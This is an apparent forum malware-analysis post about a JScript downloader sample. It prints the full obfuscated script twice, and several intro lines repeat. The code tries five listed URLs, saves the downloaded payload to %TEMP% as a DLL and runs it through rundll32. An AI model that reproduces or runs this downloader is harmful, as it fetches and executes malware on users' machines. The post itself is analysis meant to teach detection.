- May 14, 2016
- 1,597
Form https://malwaretips.com/threads/08-11-2016-4.65237/
Thanks to @Daniel Hidalgo
NRV_054BB15_.js
Why this sample ?
I think that my numerous children penguins at home could have made the same level of protection
I will show you an example of what must not be used on a script...
All AV tool that don't detect it at static / heuristic scan could be criticize
9/54
https://www.hybrid-analysis.com/sam...ecb4283681c611b19c41897377e?environmentId=100
1) What It looks like :
You really must look at the spoiler part :
some parts :
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
2-2) A quick look at the code give us a lot of infos :
2-3) Replacement of variable names :
A very easy to understand script, with only very long var names why random letters.
From :
The first URL that works allows to download a file :
Very easy method used....
A very good example to begin to learn malware scripts to your children ...
Thanks to @Daniel Hidalgo
NRV_054BB15_.js
Why this sample ?
I think that my numerous children penguins at home could have made the same level of protection
I will show you an example of what must not be used on a script...
All AV tool that don't detect it at static / heuristic scan could be criticize
9/54
https://www.hybrid-analysis.com/sam...ecb4283681c611b19c41897377e?environmentId=100
1) What It looks like :
You really must look at the spoiler part
:TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2 = ["http ://henanbusiness.net/xzwl8m2b", "http ://himichesko-varna.com/fzqrolxe", "http ://fototour.pl/hv9wgx80", "http ://choopchirk.net/349u8", "http ://rokematin.com/3ekauq6y"];
KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6 = "r3wZioifc";
var Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2 = 1;
var Ya2c7p7u5v1j6w4b7z4e3p6q1s6x8c6g2q2w7y9v3g8c0u5l1e9t1g4t9r0z8h5n6d6t6l0f8a1h5d7e2k4p1u1y1i3y2j5z2j0f7 = 2;
var EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8 = 2;
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
var WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 = DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 + KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6;
var XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5 = WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 + ".d" + "ll";
var LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.Environment("System");
if (LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
} else
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}
var NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5 = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];
for (var TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 = 0; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 < NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5["length"]; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4++)
{
try
{
var Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0 = WScript["CreateObject"](NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5[TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4]);
break;
} catch (e)
{
continue;
}
};
var XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9 = new ActiveXObject("Scripting.FileSystemObject");
var Ya3e8q6b2p9n4v0x8t1n0f8h4i0x1x5f0r4n9v4j6o3e3v2i3l0v5g3h0u8b1n7x2x1u7q7f1r1t1s6k5d3w6z9p7w1v1f6c5n9y0 = 0;
for (var Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = 0; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 < TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2.length; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 + 1)
{
try
{
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["open"]("GET", TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2[Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7], false);
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["send"]();
while (Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0.readystate < 4) WScript["Sleep"](100);
var TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8 = WScript["CreateObject"]("ADODB.Stream");
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["open"]();
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["type"] = Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["write"](Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["ResponseBody"]);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["position"] = 0;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["SaveToFile"](XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5, EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["close"]();
var Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7 = XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9.GetFile(XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5);
var JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 = Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7.ShortPath;
GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0["Run"](YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 + " " + JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 + ",woody");
WScript.Quit(0);
} catch (e) {
continue;
};
}
WScript.Quit(0);
KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6 = "r3wZioifc";
var Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2 = 1;
var Ya2c7p7u5v1j6w4b7z4e3p6q1s6x8c6g2q2w7y9v3g8c0u5l1e9t1g4t9r0z8h5n6d6t6l0f8a1h5d7e2k4p1u1y1i3y2j5z2j0f7 = 2;
var EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8 = 2;
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
var WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 = DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 + KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6;
var XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5 = WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 + ".d" + "ll";
var LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.Environment("System");
if (LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
} else
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}
var NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5 = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];
for (var TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 = 0; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 < NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5["length"]; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4++)
{
try
{
var Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0 = WScript["CreateObject"](NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5[TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4]);
break;
} catch (e)
{
continue;
}
};
var XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9 = new ActiveXObject("Scripting.FileSystemObject");
var Ya3e8q6b2p9n4v0x8t1n0f8h4i0x1x5f0r4n9v4j6o3e3v2i3l0v5g3h0u8b1n7x2x1u7q7f1r1t1s6k5d3w6z9p7w1v1f6c5n9y0 = 0;
for (var Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = 0; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 < TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2.length; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 + 1)
{
try
{
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["open"]("GET", TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2[Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7], false);
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["send"]();
while (Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0.readystate < 4) WScript["Sleep"](100);
var TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8 = WScript["CreateObject"]("ADODB.Stream");
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["open"]();
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["type"] = Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["write"](Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["ResponseBody"]);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["position"] = 0;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["SaveToFile"](XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5, EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["close"]();
var Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7 = XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9.GetFile(XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5);
var JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 = Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7.ShortPath;
GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0["Run"](YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 + " " + JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 + ",woody");
WScript.Quit(0);
} catch (e) {
continue;
};
}
WScript.Quit(0);
some parts :
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
2-2) A quick look at the code give us a lot of infos :
- all variables are very long names to "obfuscate"
- all important value are in clear (for building object, using functions...)
- formatting is very chaotic.
- all important value are in clear (for building object, using functions...)
